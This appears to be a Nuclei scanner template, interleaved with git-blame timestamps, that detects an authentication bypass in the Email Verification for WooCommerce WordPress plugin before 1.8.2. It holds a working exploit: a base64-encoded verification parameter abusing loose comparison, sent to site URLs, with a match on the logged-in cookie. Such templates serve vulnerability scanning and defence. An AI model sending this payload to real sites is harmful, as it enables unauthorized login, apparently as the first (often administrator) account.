2020-09-15 19:25:55 +00:00
|
|
|
id: wp-woocommerce-email-verification
|
2020-09-08 18:27:06 +00:00
|
|
|
info:
|
2020-09-08 11:25:55 +00:00
|
|
|
name: wordpress-emails-verification-for-woocommerce
|
2020-09-08 18:27:06 +00:00
|
|
|
author: random-robbie
|
2020-09-08 11:12:53 +00:00
|
|
|
severity: critical
|
2020-09-08 18:27:06 +00:00
|
|
|
|
|
|
|
|
|
|
|
# Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
|
|
|
|
# https://wpvulndb.com/vulnerabilities/10318
|
|
|
|
# GDPR plugin may give a false positive so double check headers
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-08 11:25:55 +00:00
|
|
|
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
|
|
|
- "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
2020-09-08 18:27:06 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "wordpress_logged_in"
|
|
|
|
part: header
|